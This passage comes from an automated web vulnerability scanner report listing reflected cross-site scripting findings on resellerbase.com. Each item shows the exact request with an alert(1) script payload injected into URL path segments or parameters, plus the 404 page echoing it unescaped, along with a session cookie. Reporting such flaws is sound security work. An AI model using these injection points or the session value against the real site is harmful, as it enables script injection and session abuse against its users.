Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f903f<script>alert(1)</script>16d1dfc3878 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themesf903f<script>alert(1)</script>16d1dfc3878/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themesf903f<script>alert(1)</script>16d1dfc3878/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.633. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8d3da<script>alert(1)</script>4e09a7f2f5e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos8d3da<script>alert(1)</script>4e09a7f2f5e/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos8d3da<script>alert(1)</script>4e09a7f2f5e/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.634. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload db877<script>alert(1)</script>f66350c36d4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/imagesdb877<script>alert(1)</script>f66350c36d4/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/imagesdb877<script>alert(1)</script>f66350c36d4/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.635. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload be981<script>alert(1)</script>32877971aec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/ratingbe981<script>alert(1)</script>32877971aec/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/ratingbe981<script>alert(1)</script>32877971aec/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.636. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c2ede<script>alert(1)</script>c04de8bce3d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/search.phpc2ede<script>alert(1)</script>c04de8bce3d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/search.phpc2ede<script>alert(1)</script>c04de8bce3d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.637. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cd7c0<a>7d95444b141 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchcd7c0<a>7d95444b141&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchcd7c0<a>7d95444b141&opt=2 was not found on this server.</p>
...[SNIP]...

2.638. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 458e6<a>b16fc90654b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...458e6<a>b16fc90654b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...458e6<a>b16fc90654b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.639. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 93e84<script>alert(1)</script>4450b3003c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&93e84<script>alert(1)</script>4450b3003c3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&93e84<script>alert(1)</script>4450b3003c3=1 was not found on this server.</p>
...[SNIP]...

2.640. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d6232<a>93d3cb0ea93 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d6232<a>93d3cb0ea93 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d6232<a>93d3cb0ea93 was not found on this server.</p>
...[SNIP]...

2.641. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58385<script>alert(1)</script>bdec5d8e6ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication58385<script>alert(1)</script>bdec5d8e6ef/mobile-content/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication58385<script>alert(1)</script>bdec5d8e6ef/mobile-content/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.642. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89fac<script>alert(1)</script>37e4d735bfc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content89fac<script>alert(1)</script>37e4d735bfc/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content89fac<script>alert(1)</script>37e4d735bfc/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.643. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ea373<script>alert(1)</script>641dd78b732 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themesea373<script>alert(1)</script>641dd78b732/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themesea373<script>alert(1)</script>641dd78b732/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.644. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 351f5<script>alert(1)</script>d383cc64e0c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos351f5<script>alert(1)</script>d383cc64e0c/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos351f5<script>alert(1)</script>d383cc64e0c/images/review/ was not found on this server.</p>
...[SNIP]...

2.645. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d4e08<script>alert(1)</script>d1974f868c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/imagesd4e08<script>alert(1)</script>d1974f868c1/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/imagesd4e08<script>alert(1)</script>d1974f868c1/review/ was not found on this server.</p>
...[SNIP]...

2.646. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8cc99<script>alert(1)</script>4366bc4e1f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review8cc99<script>alert(1)</script>4366bc4e1f/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review8cc99<script>alert(1)</script>4366bc4e1f/ was not found on this server.</p>
...[SNIP]...

2.647. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 84559<script>alert(1)</script>10020d4d013 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review/?84559<script>alert(1)</script>10020d4d013=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/?84559<script>alert(1)</script>10020d4d013=1 was not found on this server.</p>
...[SNIP]...

2.648. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1c14c<script>alert(1)</script>8f7c7d20359 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication1c14c<script>alert(1)</script>8f7c7d20359/mobile-content/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication1c14c<script>alert(1)</script>8f7c7d20359/mobile-content/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.649. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dbefe<script>alert(1)</script>2facc1a8967 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contentdbefe<script>alert(1)</script>2facc1a8967/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contentdbefe<script>alert(1)</script>2facc1a8967/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.650. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 914ae<script>alert(1)</script>0b09a63bc0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

